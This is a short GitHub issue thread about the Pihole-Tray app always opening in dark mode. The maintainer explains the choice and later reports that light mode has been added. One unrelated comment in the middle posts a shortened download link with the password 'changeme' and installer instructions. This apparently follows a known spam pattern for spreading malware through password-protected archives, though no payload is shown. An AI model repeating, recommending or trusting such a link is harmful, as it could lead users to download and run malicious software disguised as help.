### ISSUE TITLE
Always in dark mode

### ISSUE THREAD

**Issue by lexcyn** [PinchToDebug/Pihole-Tray#10]
**Issue:** Even if you have your Windows in light mode, the app will always open in dark mode with no option to change it. Not sure if this is by design, but I thought it might have been a bug since choosing either Acrylic or Mica should follow system settings.

**Comment by PinchToDebug** [comment]
It's by design. I will implement the white mode.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by PinchToDebug** [comment]
Light mode has been added!
